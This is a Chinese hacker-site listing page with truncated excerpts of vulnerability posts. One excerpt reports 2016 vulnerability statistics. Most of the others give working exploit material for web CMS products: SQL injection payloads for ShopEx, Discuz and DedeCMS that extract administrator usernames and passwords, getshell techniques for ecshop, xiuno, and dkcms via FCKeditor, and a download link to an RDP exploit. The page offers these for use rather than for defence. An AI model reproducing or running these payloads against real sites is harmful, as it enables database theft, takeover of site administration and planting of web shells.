记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

调查|2016年公布的漏洞数量创造新记录

2月6日由Risk Based Security发布的一项报告显示,去年公布的漏洞数量创造了新的纪录。这份名为《2016年度漏洞概览》的报告列举了Risk Based Security通过VulnDB漏洞检测平台提供的分析结果。 报告显示,2016年间VulnDB共报告了15000个漏洞,这一数据刷新了历史纪录。雪上加霜的是,不仅仅漏洞的数量在增加,而且报告的问题也日趋严重。常见漏洞评级体系(CVSS)是一项测量安全漏洞的风险程度的行业标准,漏洞的评级和其造成的影响成正比。2016年的已报漏洞中,21.3%的CVSS评级在9.0和10.0之间。此外,2016年间漏洞报告的方式繁多,然而相对于业界的各自为战,故障激励项目的成果令人振奋。 虽然漏洞的类型很多,2016年报告最多的Web漏洞攻击是跨站脚本攻击(XS
发布时间:2017-02-11 03:45 | 阅读:156304 | 评论:0 | 标签:行业动态 Risk Based Security VulnDB 众测 安全漏洞 跨站脚本攻击 漏洞

08cms SQL 注入漏洞利用

来源:www.08sec.com汽车的: /include/paygate/alipay/pays.php/* *类名:alipay_notify *功能:付款过程中服务器通知类 *详细:该页面是通知返回核心处理文件,不需要修改 *版本:3.1 *修改日期:2010-10-29 '说明: '以下代码只是为了方便商户测试而提供的样例代码,商户可以根据自己网站的需要,按照技术文档编写,并非一定要使用该代码。 '该代码仅供学习和研究支付宝接口使用,只是提供一个参考。*/ require_once("class/alipay_notify.php");empty($_POST) && $_POST = &$_GET;require_once&#
发布时间:2013-09-06 04:45 | 阅读:133069 | 评论:0 | 标签:Vulndb 08cms 漏洞 注入 cms 漏洞

shopex 4.8.5 api.php注入漏洞0day exp

<form method='post' action='http://www.site.com/api.php?act=search_dly_type&api_version=1.0'>columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br /><input type='submit' value='submit' /><br /></form><script>//docu
发布时间:2013-08-06 02:10 | 阅读:189678 | 评论:0 | 标签:Vulndb Shopex漏洞 0day 注入 exp 漏洞

xiuno bbs 后台Getshell漏洞

官方介绍:Xiuno 这个名字来源于圣斗士星矢白羊座的黄金圣斗士修罗,他的攻击速度和战斗力是十二宫最强的,他是速度和力量的化身;在佛教里面,修罗为六道之一,处于人道和天道之间的一道,半人半神,性情刚烈,好战斗。我们取其寓意,希望XIUNO变得越来越强,越来越快。在 Xiuno BBS 的第一行代码开始(一共大约有4W多行代码,历时多年积累)对性能的追求就到了苛刻,完美,歇斯底里,神经质,作者本人经常因为权衡一个方案而陷入冥想状态,在千万级数据下,最终的程序执行速度基本控制在0.00x秒,是作者本人比较满意的。漏洞描述:xiuno后台在写入配置文件时出现漏洞,导致代码执行1. 系统配置并非存放在数据库中,而是存放在conf.php中;2. 使用数组的方法存放;3. 有转义: ‘ =>’ ;4. ‘’没有转义;5.
发布时间:2013-04-24 16:05 | 阅读:160173 | 评论:0 | 标签:Vulndb Getshell漏洞 xiuno bbs漏洞 漏洞

Discuz交友插件漏洞附EXP

DZ交友插件漏洞jiaoyou.php?pid=1有的注入需要登录,注入代码如下:' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1爆管理账号密码方法一:' or @`'` and(select 1 from(select count(*),concat((select (select (S
发布时间:2013-04-23 17:30 | 阅读:130025 | 评论:0 | 标签:Vulndb Discuz!交友插件漏洞 Discuz漏洞 exp 漏洞

PHPCMS 2008 最新漏洞

0x01 前沿 Phpcms2008 是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。3年来,凭借 Phpcms 团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念,使得 Phpcms 得到了近10万网站的认可,并且越来越多地被应用到大中型商业网站。0x02 写在前面的话 phpcms 2008 这是我看第二次代码了,之前已经发现了一些问题,只是没放出来,这次稍微仔细看了看,又发现了一些问题这次就放2个吧,其中啥啥的getshell暂时就不会放了,比起v9来说,2008的安全性能确实差很多,模块化以及代码严谨程度也没有v9强这次还没把
发布时间:2013-03-25 19:35 | 阅读:170375 | 评论:0 | 标签:Vulndb PHPCMS2008漏洞 Phpcms漏洞 cms

Ecshop 后台getshell

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板而模板里面可以执行他定义的php代码,这样只要可以写出模板 然后找到调用就可以拿到shell了但是ecshop似乎不支持{php}{/php}这个标签来执行php代码admin/template.phpif ($_REQUEST['act'] == 'update_library') { check_authz_json('library_manage');  $html = stripslashes(json_str_iconv($_POST['html']));  $lib_file = '../theme
发布时间:2013-02-10 19:40 | 阅读:151599 | 评论:0 | 标签:Vulndb ecshop GETSHeLL webshell

ms13-020 3389远程溢出exp(演示)

很狗血的中文翻译,不知是作者自己翻译还是GG翻译或是故意搞成这样伪装的总之,咱只有看的份,看那价格!下载地址:http://pan.baidu.com/share/link?shareid=243199&uk=2869270905
发布时间:2013-02-04 22:15 | 阅读:384300 | 评论:0 | 标签:Vulndb ms13-020 ms13-020 exp

DedeCms SQL注射漏洞再利用

需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞. 原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码. 详细说明 跟这个漏洞 WooYun: Dedecms SQL注射导致审核机制绕过漏洞 是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的. POST提交以下数据,其实不用POST提交的,这样隐蔽点. http://www.site.com/member/reg_new.php POST数据 dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4r
发布时间:2013-01-17 17:20 | 阅读:128332 | 评论:0 | 标签:Vulndb Dedecms Dedecms漏洞 SQL注射

动科(dkcms)漏洞利用

看了下,主要是差不多3个版本为主吧,v2.0 v3.1 v4.2 官网竟然找不到源码下载,就百度了,下载了这3款源码,因为是asp的源码,大多都是看看默认数据库,一下是三款默认数据库 V2.0 data/dkcm_ssdfhwejkfs.mdb V3.1 _data/___dkcms_30_free.mdb V4.2 _data/I^(()UU()H.mdb 默认后台:admin/ 编辑器:http://127.0.0.1/admin/fckeditor 这些都是,由此可见,官方安全意识挺差的,至于后台拿shell,fck编辑器突破可拿shell 建立asp文件夹拿SHELL Fck路径下利用: Admin/FCKeditor/editor/filemanager/connectors/asp/co
发布时间:2013-01-16 15:21 | 阅读:202646 | 评论:0 | 标签:Vulndb dkcms dkcms漏洞 动科漏洞

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词